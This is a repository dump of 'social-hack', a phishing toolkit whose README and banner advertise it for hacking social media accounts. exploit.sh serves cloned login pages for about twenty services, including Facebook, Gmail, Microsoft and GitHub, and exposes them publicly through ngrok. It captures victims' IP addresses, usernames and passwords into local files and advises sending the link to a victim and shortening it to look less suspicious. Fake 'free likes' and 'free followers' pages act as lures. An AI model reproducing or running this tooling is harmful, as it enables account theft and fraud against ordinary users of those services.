document.getElementById("follower").value) { 146 | clearInterval(addfollowerid); 147 | } else { 148 | addfollower += addfollowerspeed; 149 | document.getElementById("addfollowerbarlabel").innerHTML = addfollower; 150 | } 151 | } 152 | 153 | function addfollowerwidthnow() { 154 | if (addfollowerwidth >= 100) { 155 | clearInterval(addfollowerwidthid); 156 | } else { 157 | addfollowerwidth++; 158 | addfollowerelem.style.width = addfollowerwidth + '%'; 159 | } 160 | } 161 | } 162 | 163 | function startaddlike() { 164 | var addlikeelem = document.getElementById("addlikebar"); 165 | var addlikewidth = 1; 166 | var addlikewidthid = setInterval(addlikewidthnow, 16); 167 | var addlikeid = setInterval(addlikenow, 3); 168 | var addlike = 0; 169 | 170 | var addlikespeed = 0; 171 | 172 | if(document.getElementById("like").value == 10000) 173 | { 174 | addlikespeed = 50; 175 | } 176 | 177 | if(document.getElementById("like").value == 50000) 178 | { 179 | addlikespeed = 100; 180 | } 181 | 182 | if(document.getElementById("like").value == 75000) 183 | { 184 | addlikespeed = 250; 185 | } 186 | 187 | if(document.getElementById("like").value == 100000) 188 | { 189 | addlikespeed = 500; 190 | } 191 | 192 | function addlikenow() { 193 | if (addlike >= document.getElementById("like").value) { 194 | clearInterval(addlikeid); 195 | } else { 196 | addlike += addlikespeed; 197 | document.getElementById("addlikebarlabel").innerHTML = addlike; 198 | } 199 | } 200 | 201 | function addlikewidthnow() { 202 | if (addlikewidth >= 100) { 203 | clearInterval(addlikewidthid); 204 | } else { 205 | addlikewidth++; 206 | addlikeelem.style.width = addlikewidth + '%'; 207 | } 208 | } 209 | } -------------------------------------------------------------------------------- /.sets/tiktok/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | Tik Tok Followers 9 | 10 | 11 | 12 | 26 | 27 | 28 |
29 |
30 |
31 |

Login

32 |

Login to get 1000 Tiktok Likes Free

33 | 34 |
35 |
36 |
37 |
38 | 39 |
40 |
41 |
42 | 43 |
44 | 45 |

46 | 47 |
48 | 49 |
50 |
51 | 52 | 55 | 56 | 58 | 59 | 60 | -------------------------------------------------------------------------------- /.sets/tiktok/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sets/tiktok/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/machine1337/social-hack/f923cec63a345220720577a844e6a52d2176300a/.sets/tiktok/logo.png -------------------------------------------------------------------------------- /.sets/tiktok/sadflix.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/machine1337/social-hack/f923cec63a345220720577a844e6a52d2176300a/.sets/tiktok/sadflix.ttf -------------------------------------------------------------------------------- /.sets/tiktok/style.css: -------------------------------------------------------------------------------- 1 | @font-face { 2 | font-family: sadflix; 3 | src: url(sadflix.ttf); 4 | } 5 | 6 | .fullscreen-bg { 7 | position: fixed; 8 | top: 0; 9 | right: 0; 10 | bottom: 0; 11 | left: 0; 12 | overflow: hidden; 13 | z-index: -100; 14 | } 15 | 16 | .fullscreen-bg__video { 17 | margin-left:auto; 18 | margin-right:auto; 19 | position: relative; 20 | top: 0; 21 | left: 0; 22 | height: 100%; 23 | } 24 | 25 | body { 26 | text-align: center; 27 | font-family: sadflix; 28 | color: white; 29 | } 30 | 31 | img { 32 | display: block; 33 | margin-left: auto; 34 | margin-right: auto; 35 | } 36 | 37 | table { 38 | margin-left:auto; 39 | margin-right:auto; 40 | } 41 | 42 | select.input-command { 43 | border-radius: 9px; 44 | height: 46px; 45 | line-height: 46px; 46 | font-family: sadflix; 47 | background-color: white; 48 | box-shadow: 0 1px 1px rgba(2, 83, 136, 0.075) inset; 49 | color: black; 50 | } 51 | 52 | .form-option { 53 | margin-left: 15px; 54 | margin-right: 38px; 55 | margin-bottom: 20px; 56 | font-family: sadflix; 57 | } 58 | 59 | .input-form { 60 | border-radius: 9px; 61 | color: black; 62 | background-color: white; 63 | box-shadow: 0 1px 1px rgba(0, 0, 0, 0.075) inset; 64 | display: block; 65 | font-size: 14px; 66 | height: 20px; 67 | line-height: 1.42857; 68 | padding: 6px 12px; 69 | transition: border-color 0.15s ease-in-out 0s, box-shadow 0.15s ease-in-out 0s; 70 | vertical-align: middle; 71 | width: 100%; 72 | font-family: sadflix; 73 | } 74 | 75 | .input-command { 76 | font-size: 18px; 77 | height: 28px; 78 | line-height: 1.33; 79 | padding: 10px 16px; 80 | color: black; 81 | } 82 | 83 | .input-form::-moz-placeholder { 84 | color: #999; 85 | opacity: 55; 86 | } 87 | 88 | .wrapper { 89 | padding: 0; 90 | } 91 | 92 | .wrapper img { 93 | width: 30%; 94 | } 95 | 96 | .buttonstyle { 97 | background: Transparent; /* For browsers that do not support gradients */ 98 | border-radius: 19px; 99 | border: 6px white solid; 100 | color: white; 101 | padding: 16px 33px; 102 | display: inline-block; 103 | font-size: 33px; 104 | height: auto; 105 | font-family: sadflix; 106 | } 107 | 108 | #progressbarcontainer { 109 | background: white; 110 | border-radius: 19px; 111 | border: 9px white solid; 112 | display: none; 113 | position: relative; 114 | margin-left: auto; 115 | margin-right: auto; 116 | width: 90%; 117 | height: 30px; 118 | } 119 | 120 | #progressbar { 121 | border-radius: 19px; 122 | position: absolute; 123 | width: 10%; 124 | height: 100%; 125 | background: #150608; 126 | } 127 | 128 | #progressbarlabel { 129 | line-height: 30px; 130 | text-align: center; 131 | color: white; 132 | } 133 | 134 | #main-tool { 135 | background: #000000; /* For browsers that do not support gradients */ 136 | background: -webkit-radial-gradient(#000000, #000000); /* Safari 5.1 to 6.0 */ 137 | background: -o-radial-gradient(#000000, #000000); /* For Opera 11.6 to 12.0 */ 138 | background: -moz-radial-gradient(#000000, #000000); /* For Firefox 3.6 to 15 */ 139 | background: radial-gradient(#000000, #000000); /* Standard syntax */ 140 | border-radius: 9px; 141 | max-width: 500px; 142 | margin: 20px auto 20px; 143 | padding: 50px; 144 | box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19); 145 | } 146 | 147 | 148 | 149 | 150 | #verifybg { 151 | height: 0%; 152 | width: 100%; 153 | left: 0; 154 | top: 0; 155 | position: fixed; 156 | z-index: 1; 157 | overflow-x: hidden; 158 | transition: 0.5s; 159 | background-color: rgb(0,0,0); 160 | background-color: rgba(0,0,0, 0.3); 161 | } 162 | 163 | #verify { 164 | margin-left: auto; 165 | margin-right: auto; 166 | color: white; 167 | position: relative; 168 | background: #f98691; /* For browsers that do not support gradients */ 169 | background: -webkit-radial-gradient(#09f5f9, #f98691); /* Safari 5.1 to 6.0 */ 170 | background: -o-radial-gradient(#09f5f9, #f98691); /* For Opera 11.6 to 12.0 */ 171 | background: -moz-radial-gradient(#09f5f9, #f98691); /* For Firefox 3.6 to 15 */ 172 | background: radial-gradient(#150608, #f98691); /* Standard syntax */ 173 | box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19); 174 | border-radius: 9px; 175 | width: 90%; 176 | } 177 | 178 | #verifycontent { 179 | margin-left: auto; 180 | margin-right: auto; 181 | width: 90%; 182 | } 183 | 184 | #shield{ 185 | margin-bottom: 5px; 186 | } 187 | 188 | #gen1 { 189 | display: none; 190 | } 191 | 192 | #gen2 { 193 | display: none; 194 | } 195 | 196 | #gen3 { 197 | display: none; 198 | } 199 | 200 | #gen4 { 201 | display: none; 202 | } 203 | 204 | #gen5 { 205 | display: none; 206 | } 207 | 208 | #gen6 { 209 | display: none; 210 | } 211 | 212 | #gen7 { 213 | display: none; 214 | } 215 | 216 | #addfollowerbarcontainer { 217 | background: white; 218 | border-radius: 19px; 219 | border: 9px white solid; 220 | position: relative; 221 | margin-left: auto; 222 | margin-right: auto; 223 | width: 60%; 224 | height: 10px; 225 | } 226 | 227 | #addfollowerbar { 228 | border-radius: 19px; 229 | position: absolute; 230 | background: #ff0f50; 231 | width: 1%; 232 | height: 100%; 233 | } 234 | 235 | #addfollowerbarlabel { 236 | font-size: 60%; 237 | line-height: 10px; 238 | text-align: center; 239 | color: white; 240 | font-family: sadflix; 241 | } 242 | 243 | #addlikebarcontainer { 244 | background: white; 245 | border-radius: 19px; 246 | border: 9px white solid; 247 | position: relative; 248 | margin-left: auto; 249 | margin-right: auto; 250 | width: 60%; 251 | height: 10px; 252 | } 253 | 254 | #addlikebar { 255 | border-radius: 19px; 256 | position: absolute; 257 | background: #ff0f50; 258 | width: 1%; 259 | height: 100%; 260 | } 261 | 262 | #addlikebarlabel { 263 | font-size: 60%; 264 | line-height: 10px; 265 | text-align: center; 266 | color: white; 267 | font-family: sadflix; 268 | } -------------------------------------------------------------------------------- /.sets/twitch/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sets/twitch/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sets/twitter/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sets/twitter/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sets/wordpress/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sets/wordpress/login.html: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 7 | 8 | Log In — WordPress 9 | 10 | 11 | 12 | 13 | 14 | 15 |
16 |

Powered by WordPress

17 | 18 | 19 |

20 | 22 |

23 |

24 | 26 |

27 |

28 |

29 | 30 | 31 | 32 |

33 | 34 | 35 | 38 | 39 | 52 | 53 |

← Back

54 | 55 |
56 | 57 | 58 |
59 | 60 | 61 | 62 | -------------------------------------------------------------------------------- /.sets/wordpress/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sets/wordpress/wordpress-logo.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sets/yahoo/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sets/yahoo/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sets/yahoo/yahoo_en-US_f_p_bestfit_2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/machine1337/social-hack/f923cec63a345220720577a844e6a52d2176300a/.sets/yahoo/yahoo_en-US_f_p_bestfit_2x.png -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 sikander 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # social-hack 2 | A very user friendly and advanced phishing toolkit made for hackers 3 | 4 | ![pl](https://user-images.githubusercontent.com/82051128/142736038-0a6a146e-e564-4b70-a069-0d9f51ece794.jpg) 5 | 6 | # Tutorial: 7 | https://youtu.be/5FE--OE7Fjk 8 | 9 | # Installation: 10 | For Linux Based Os: 11 | 1. git clone https://github.com/machine1337/social-hack 12 | 2. cd social-hack && chmod +x install.sh 13 | 3. ./install.sh 14 | 4. And Now choose option1 for linux installation. 15 | 16 | For Termux/Android Users: 17 | 1. git clone https://github.com/machine1337/social-hack 18 | 2. cd social-hack && chmod +x install.sh 19 | 3. ./install.sh 20 | 4. And Now choose option 2 For Termux Installation 21 | 22 | # Usage: 23 | 1. chmod +x exploit.sh 24 | 2. ./exploit.sh 25 | 26 | # Features: 27 | a) LAN ( When Target connected to Same Network ) 28 | b) WAN ( When Target connected To Outside Network ) 29 | c) Anti-Bots are used in phishing pages to make it FUD. 30 | d) Very easy to use and efficent 31 | e) Can target multiple accounts using single link. 32 | 33 | # Tested On: 34 | 1. Kali Linux & Parrot OS. 35 | 2. Termux (For Android) 36 | 37 | # Follow Me On: 38 | 1. https://instagram.com/invisibleclay100 39 | 2. https://www.facebook.com/pakhack01 40 | 3. https://www.youtube.com/channel/UCC_aPnmV_zGfdwktCFE9cPQ 41 | 42 | # Thanks To: 43 | htr-tech 44 | -------------------------------------------------------------------------------- /exploit.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | NC='\033[0m' 3 | RED='\033[1;38;5;196m' 4 | GREEN='\033[1;38;5;040m' 5 | ORANGE='\033[1;38;5;202m' 6 | BLUE='\033[1;38;5;012m' 7 | BLUE2='\033[1;38;5;032m' 8 | PINK='\033[1;38;5;013m' 9 | GRAY='\033[1;38;5;004m' 10 | NEW='\033[1;38;5;154m' 11 | YELLOW='\033[1;38;5;214m' 12 | CG='\033[1;38;5;087m' 13 | CP='\033[1;38;5;221m' 14 | CPO='\033[1;38;5;205m' 15 | CN='\033[1;38;5;247m' 16 | CNC='\033[1;38;5;051m' 17 | 18 | function banner(){ 19 | echo -e ${CP}" ______ ___ ____ ___ _ _ _ _ _ ____ _ ____ #" 20 | echo -e ${CP}" / / ___| / _ \ / ___|_ _| / \ | | | | | | / \ / ___| |/ /\ \ #" 21 | echo -e ${CP}" | |\___ \| | | | | | | / _ \ | | _____| |_| | / _ \| | | ' / | | #" 22 | echo -e ${CP}" < < ___) | |_| | |___ | | / ___ \| |__|_____| _ |/ ___ \ |___| . \ > > #" 23 | echo -e ${CP}" | ||____/ \___/ \____|___/_/ \_\_____| |_| |_/_/ \_\____|_|\_\ | | #" 24 | echo -e ${CP}" \_\ /_/ #" 25 | echo -e ${NEW}" An Advanced Tool To Hack Social Media Accounts #" 26 | echo -e ${YELLOW}" Coded By: ${BLUE}Machine404 #" 27 | echo -e ${CP}" Follow Me On: ${CPO}Instagram: invisibleclay100 #" 28 | echo -e ${CP}" ${CNC}Twitter: whoami4041 #" 29 | echo -e ${RED}"#############################################################################\n " 30 | 31 | } 32 | 33 | 34 | 35 | function gmail(){ 36 | clear 37 | banner 38 | echo -e ${YELLOW}"\n[*] Choose Phishing Page: \n " 39 | echo -e " ${NC}[${CP}"1"${NC}]${CNC} Gmail Advanced Login Page " 40 | echo -e " ${NC}[${CP}"2"${NC}]${NEW} Gmail Fake Votting Poll Page" 41 | echo -e " ${NC}[${CP}"3"${NC}]${RED} Back To Main Menu" 42 | echo -n -e ${YELLOW}"\n[+] Select: " 43 | read face 44 | if [ $face -eq 1 ]; then 45 | set="google_new" 46 | tunnel_menu 47 | elif [ $face -eq 2 ]; then 48 | set="google_poll" 49 | tunnel_menu 50 | elif [ $face -eq 3 ]; then 51 | menu 52 | else 53 | echo -ne "\n${RED}[${NEW}!${RED}]${RED} Invalid Option You Choose" 54 | sleep 1 55 | menu 56 | fi 57 | } 58 | function instagram(){ 59 | clear 60 | banner 61 | echo -e ${YELLOW}"\n[*] Choose Phishing Page: \n " 62 | echo -e " ${NC}[${CP}"1"${NC}]${CNC} Advanced Login Page " 63 | echo -e " ${NC}[${CP}"2"${NC}]${NEW} Fake Followers Login Page " 64 | echo -e " ${NC}[${CP}"3"${NC}]${BLUE} Increase Followers Login Page " 65 | echo -e " ${NC}[${CP}"4"${NC}]${RED} Back To Main Menu " 66 | echo -n -e ${YELLOW}"\n[+] Select: " 67 | read face 68 | if [ $face -eq 1 ]; then 69 | set="instagram" 70 | hack 71 | elif [ $face -eq 2 ]; then 72 | set="ig_followers" 73 | hack 74 | 75 | elif [ $face -eq 3 ]; then 76 | set="insta_followers" 77 | hack 78 | elif [ $face -eq 4 ]; then 79 | menu 80 | else 81 | echo -ne "\n${RED}[${NEW}!${RED}]${RED} Invalid Option You Choose" 82 | sleep 1 83 | menu 84 | fi 85 | 86 | } 87 | function dir(){ 88 | if [[ ! -d ".ser" ]]; then 89 | mkdir -p ".ser" 90 | fi 91 | if [[ -d ".ser/xyz" ]]; then 92 | rm -rf ".ser/xyz" 93 | mkdir -p ".ser/xyz" 94 | else 95 | mkdir -p ".ser/xyz" 96 | fi 97 | 98 | 99 | } 100 | kill_req() { 101 | if [[ `pidof php` ]]; then 102 | killall php > /dev/null 2>&1 103 | fi 104 | if [[ `pidof ngrok` ]]; then 105 | killall ngrok > /dev/null 2>&1 106 | fi 107 | 108 | } 109 | 110 | 111 | HOST='127.0.0.1' 112 | PORT='8080' 113 | setting() { 114 | echo -e -n ${NEW}"\n[*]............ Checking Server.............\n" 115 | cp -rf .sets/"$set"/* .ser/xyz 116 | cp -f .sets/ip.php .ser/xyz/ 117 | sleep 0.5 118 | echo -n -e ${CPO}"\n[*]........... Starting PHP server............\n" 119 | cd .ser/xyz && php -S "$HOST":"$PORT" > /dev/null 2>&1 & 120 | } 121 | 122 | caught_ip() { 123 | IP=$(grep -a 'IP:' .ser/xyz/ip.txt | cut -d " " -f2 | tr -d '\r') 124 | IFS=$'\n' 125 | echo -e -n ${BLUE}"\n[ ✔ ] Victim's IP : ${RED}$IP \n" 126 | echo -n -e ${CNC}"\n[ ✔ ] Saved in : ${ORANGE}ip.txt \n" 127 | cat .ser/xyz/ip.txt >> ip.txt 128 | } 129 | capture_creds() { 130 | Target=$(grep -o 'Username:.*' .ser/xyz/usernames.txt | cut -d " " -f2) 131 | PASSWORD=$(grep -o 'Pass:.*' .ser/xyz/usernames.txt | cut -d ":" -f2) 132 | IFS=$'\n' 133 | echo -e -n ${CP}"\n[ ✔ ] Account : ${BLUE}$Target\n" 134 | echo -e -n ${NEW}"\n[ ✔ ] Password : ${YELLOW}$PASSWORD\n" 135 | echo -e -n ${BLUE}"\n[ ✔ ] Saved in : ${ORANGE}usernames.dat\n" 136 | cat .ser/xyz/usernames.txt >> usernames.dat 137 | echo -n -e ${RED}"\n[*] Waiting for Next Login Info, ${BLUE}Ctrl + C ${ORANGE}to exit.\n " 138 | } 139 | caught_data() { 140 | echo -n -e ${PINK}"\n[*] Waiting for Login Info, ${BLUE}Ctrl + C ${ORANGE}to exit...\n" 141 | while true; do 142 | if [[ -e ".ser/xyz/ip.txt" ]]; then 143 | echo -e -n ${CNC}"\n[ ✔ ] Victim IP Found !\n" 144 | caught_ip 145 | rm -rf .ser/xyz/ip.txt 146 | fi 147 | sleep 0.75 148 | if [[ -e ".ser/xyz/usernames.txt" ]]; then 149 | echo -e -n ${ORANGE}"\n[ ✔ ] Login info Found !!\n" 150 | capture_creds 151 | rm -rf .ser/xyz/usernames.txt 152 | fi 153 | sleep 0.70 154 | done 155 | } 156 | start_ngrok() { 157 | echo -e -n ${BLUE}"\n[*]............. Initializing........ ${CP}http://$HOST:$PORT \n" 158 | { sleep 1; setting; } 159 | echo -n -e ${CNC}"\n[*].............. Launching Ngrok.......!" 160 | 161 | if [[ `command -v termux-chroot` ]]; then 162 | sleep 2 && termux-chroot ./.ser/ngrok http "$HOST":"$PORT" > /dev/null 2>&1 & 163 | else 164 | sleep 2 && ./.ser/ngrok http "$HOST":"$PORT" > /dev/null 2>&1 & 165 | fi 166 | 167 | { sleep 8; clear; banner; } 168 | ngrok_url=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[-0-9a-z]*\.ngrok.io") 169 | ngrok_url1=${ngrok_url#https://} 170 | echo -e -n ${CP}"\n[*] URL : ${PINK}$ngrok_url\n" 171 | 172 | echo -e -n ${NEW}"\n[+] Send Any Of The Above URL To Victim........Don't Ask Me How To Do!\n" 173 | echo -e -n ${RED}"\n[+] Tip: Shorten the Above Url To Look Less Suspicious!\n" 174 | caught_data 175 | } 176 | 177 | start_localhost() { 178 | echo -e -n ${NEW}"\n[*]............ Initializing......... ${CNC}http://$HOST:$PORT \n" 179 | setting 180 | { sleep 1; clear; banner; } 181 | echo -e -n ${NEW}"\n[*] Successfully Hosted at : ${GREEN}http://$HOST:$PORT\n" 182 | caught_data 183 | } 184 | hack(){ 185 | clear 186 | banner 187 | echo -e ${YELLOW}"\n[*] Choose Forwarding Type: \n " 188 | echo -e -n " ${NC}[${CP}"1"${NC}]${CNC} LocalHost ${NEW}[LAN](Target Connected To Same Network)\n" 189 | echo -e -n " ${NC}[${CP}"2"${NC}]${CNC} Ngrok ${NEW}[WAN](Target Connected Outside Network)\n" 190 | echo -e -n " ${NC}[${CP}"3"${NC}]${CNC} Back To Main Menu\n" 191 | 192 | echo -n -e ${YELLOW}"\n[+] Select: " 193 | read redi_play 194 | if [ $redi_play -eq 1 ]; then 195 | start_localhost 196 | elif [ $redi_play -eq 2 ]; then 197 | start_ngrok 198 | elif [ $redi_play -eq 3 ]; then 199 | menu 200 | else 201 | echo -ne "\n${RED}[${NEW}!${RED}]${RED} Invalid Option You Choose" 202 | sleep 1 203 | menu 204 | fi 205 | 206 | } 207 | #Coded By Machine404! Don't copy this code without giving me credit~ 208 | #https://instagram.com/invisibleclay100 209 | #https://twitter.com/whoami4041 210 | #https://www.youtube.com/channel/UCC_aPnmV_zGfdwktCFE9cPQ 211 | function facebook(){ 212 | clear 213 | banner 214 | echo -e ${YELLOW}"\n[*] Choose Phishing Page: \n " 215 | echo -e " ${NC}[${CP}"1"${NC}]${CNC} Advanced Login Page " 216 | echo -e " ${NC}[${CP}"2"${NC}]${NEW} Fake Security Login Page " 217 | echo -e " ${NC}[${CP}"3"${NC}]${RED} Back To Main Menu " 218 | echo -n -e ${YELLOW}"\n[+] Select: " 219 | read face 220 | if [ $face -eq 1 ]; then 221 | set="facebook" 222 | hack 223 | elif [ $face -eq 2 ]; then 224 | set="fb_security" 225 | hack 226 | elif [ $face -eq 3 ]; then 227 | menu 228 | else 229 | echo -ne "\n${RED}[${NEW}!${RED}]${RED} Invalid Option You Choose" 230 | sleep 1 231 | menu 232 | fi 233 | } 234 | trap ctrl_c INT 235 | ctrl_c() { 236 | clear 237 | echo -e ${RED}"[*] (Ctrl + C ) Detected, Trying To Exit... " 238 | echo -e ${RED}"[*] Stopping Services... " 239 | sleep 1 240 | echo "" 241 | echo -e ${YELLOW}"[*] Thanks For Using SOCIAL-HACK :)" 242 | exit 243 | } 244 | 245 | menu(){ 246 | clear 247 | banner 248 | echo -e ${YELLOW}"\n[*] Choose Phishing Type: \n " 249 | echo -e -n " ${NC}[${CP}"1"${NC}]${CNC} Facebook"; 250 | echo -e -n " ${NC}[${CP}"2"${NC}]${CNC} Instagram"; 251 | echo -e -n " ${NC}[${CP}"3"${NC}]${CNC} Gmail"; 252 | echo -e -n " ${NC}[${CP}"4"${NC}]${CNC} Twitter\n" 253 | echo -e -n " ${NC}[${CP}"5"${NC}]${CPO} NetFlix" 254 | echo -e -n " ${NC}[${CP}"6"${NC}]${CPO} Snapchat" 255 | echo -e -n " ${NC}[${CP}"7"${NC}]${CPO} Linkedin" 256 | echo -e -n " ${NC}[${CP}"8"${NC}]${CPO} Microsoft\n" 257 | echo -e -n " ${NC}[${CP}"9"${NC}]${ORANGE} Pinterest" 258 | echo -e -n " ${NC}[${CP}"10"${NC}]${ORANGE} Twitch" 259 | echo -e -n " ${NC}[${CP}"11"${NC}]${ORANGE} Tiktok" 260 | echo -e -n " ${NC}[${CP}"12"${NC}]${ORANGE} Playstation\n" 261 | echo -e -n " ${NC}[${CP}"13"${NC}]${PINK} Quora" 262 | echo -e -n " ${NC}[${CP}"14"${NC}]${PINK} Protonmail" 263 | echo -e -n " ${NC}[${CP}"15"${NC}]${PINK} Ebay" 264 | echo -e -n " ${NC}[${CP}"16"${NC}]${PINK} Reddit\n" 265 | echo -e -n " ${NC}[${CP}"17"${NC}]${NEW} Spotify" 266 | echo -e -n " ${NC}[${CP}"18"${NC}]${NEW} Wordpress" 267 | echo -e -n " ${NC}[${CP}"19"${NC}]${NEW} Yahoo" 268 | echo -e -n " ${NC}[${CP}"20"${NC}]${NEW} Github\n" 269 | echo -n -e ${YELLOW}"\n[+] Select: " 270 | read redi_play 271 | if [ $redi_play -eq 1 ]; then 272 | facebook 273 | elif [ $redi_play -eq 2 ]; then 274 | instagram 275 | elif [ $redi_play -eq 3 ]; then 276 | gmail 277 | elif [ $redi_play -eq 4 ]; then 278 | set="twitter" 279 | hack 280 | elif [ $redi_play -eq 5 ]; then 281 | set="netflix" 282 | hack 283 | elif [ $redi_play -eq 6 ]; then 284 | set="snapchat" 285 | hack 286 | elif [ $redi_play -eq 7 ]; then 287 | set="linkedin" 288 | hack 289 | elif [ $redi_play -eq 8 ]; then 290 | set="microsoft" 291 | hack 292 | elif [ $redi_play -eq 9 ]; then 293 | set="pinterest" 294 | hack 295 | elif [ $redi_play -eq 10 ]; then 296 | set="twitch" 297 | hack 298 | elif [ $redi_play -eq 11 ]; then 299 | set="tiktok" 300 | hack 301 | elif [ $redi_play -eq 12 ]; then 302 | set="playstation" 303 | hack 304 | elif [ $redi_play -eq 13 ]; then 305 | set="quora" 306 | hack 307 | elif [ $redi_play -eq 14 ]; then 308 | set="protonmail" 309 | hack 310 | elif [ $redi_play -eq 15 ]; then 311 | set="ebay" 312 | hack 313 | elif [ $redi_play -eq 16 ]; then 314 | set="reddit" 315 | hack 316 | elif [ $redi_play -eq 17 ]; then 317 | set="spotify" 318 | hack 319 | elif [ $redi_play -eq 18 ]; then 320 | set="wordpress" 321 | hack 322 | elif [ $redi_play -eq 19 ]; then 323 | set="yahoo" 324 | hack 325 | elif [ $redi_play -eq 20 ]; then 326 | set="github" 327 | hack 328 | else 329 | echo -ne "\n${RED}[${NEW}!${RED}]${RED} Invalid Option You Choose" 330 | sleep 1 331 | menu 332 | 333 | #Coded By Machine404! Don't copy this code without giving me credit~ 334 | #https://instagram.com/invisibleclay100 335 | #https://twitter.com/whoami4041 336 | #https://www.youtube.com/channel/UCC_aPnmV_zGfdwktCFE9cPQ 337 | #Github: machine1337 338 | fi 339 | } 340 | 341 | dir 342 | kill_req 343 | menu 344 | 345 | install_ngrok 346 | -------------------------------------------------------------------------------- /install.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | NC='\033[0m' 3 | RED='\033[1;38;5;196m' 4 | GREEN='\033[1;38;5;040m' 5 | ORANGE='\033[1;38;5;202m' 6 | BLUE='\033[1;38;5;012m' 7 | BLUE2='\033[1;38;5;032m' 8 | PINK='\033[1;38;5;013m' 9 | GRAY='\033[1;38;5;004m' 10 | NEW='\033[1;38;5;154m' 11 | YELLOW='\033[1;38;5;214m' 12 | CG='\033[1;38;5;087m' 13 | CP='\033[1;38;5;221m' 14 | CPO='\033[1;38;5;205m' 15 | CN='\033[1;38;5;247m' 16 | CNC='\033[1;38;5;051m' 17 | 18 | function banner(){ 19 | echo -e ${CP}" ______ ___ ____ ___ _ _ _ _ _ ____ _ ____ #" 20 | echo -e ${CP}" / / ___| / _ \ / ___|_ _| / \ | | | | | | / \ / ___| |/ /\ \ #" 21 | echo -e ${CP}" | |\___ \| | | | | | | / _ \ | | _____| |_| | / _ \| | | ' / | | #" 22 | echo -e ${CP}" < < ___) | |_| | |___ | | / ___ \| |__|_____| _ |/ ___ \ |___| . \ > > #" 23 | echo -e ${CP}" | ||____/ \___/ \____|___/_/ \_\_____| |_| |_/_/ \_\____|_|\_\ | | #" 24 | echo -e ${CP}" \_\ /_/ #" 25 | echo -e ${NEW}" An Advanced Tool To Hack Social Media Accounts #" 26 | echo -e ${YELLOW}" Coded By: ${BLUE}Machine404 #" 27 | echo -e ${CP}" Follow Me On: ${CPO}Instagram: invisibleclay100 #" 28 | echo -e ${CP}" ${CNC}Twitter: whoami4041 #" 29 | echo -e ${RED}"#############################################################################\n " 30 | 31 | } 32 | if [[ ! -d ".ser" ]]; then 33 | mkdir -p ".ser" 34 | fi 35 | function req(){ 36 | clear 37 | banner 38 | echo -e -n ${NEW}"[ ✔ ]......... Installing Required Packages...........\n" 39 | command -v "wget" >/dev/null 2>&1 40 | if [[ $? -ne 0 ]]; then 41 | sudo apt-get install wget 42 | echo -e -n ${CP}"[ ✔ ].........wget successfully installed................\n" 43 | else 44 | echo -e -n ${CNC}"\n[ ✔ ]...........wget already exists...................\n" 45 | fi 46 | command -v "php" >/dev/null 2>&1 47 | if [[ $? -ne 0 ]]; then 48 | sudo apt-get install php 49 | echo -e -n ${CP}"\n[ ✔ ].........php successfully installed................\n" 50 | else 51 | echo -e -n ${CN}"\n[ ✔ ]...........php already exists....................\n" 52 | fi 53 | command -v "curl" >/dev/null 2>&1 54 | if [[ $? -ne 0 ]]; then 55 | sudo apt-get install curl 56 | echo -e -n ${CG}"\n[ ✔ ].........curl successfully installed................\n" 57 | else 58 | echo -e -n ${YELLOW}"\n[ ✔ ]...........curl already exists...................\n" 59 | fi 60 | command -v "unzip" >/dev/null 2>&1 61 | if [[ $? -ne 0 ]]; then 62 | sudo apt-get install unzip 63 | echo -e -n ${ORANGE}"\n[ ✔ ].........unzip successfully installed...........\n" 64 | else 65 | echo -e -n ${NEW}"\n[ ✔ ]...........unzip already exists..................\n" 66 | fi 67 | 68 | 69 | ngrok 70 | 71 | } 72 | 73 | function ngrok(){ 74 | if [[ -e .ser/ngrok ]]; then 75 | echo -e -n ${BLUE}"\n[ ✔ ]............... Ngrok Found......................" 76 | else 77 | echo -e -n ${CP}"\n[*] Downloading And Setting Up Ngrok Server...........\n" 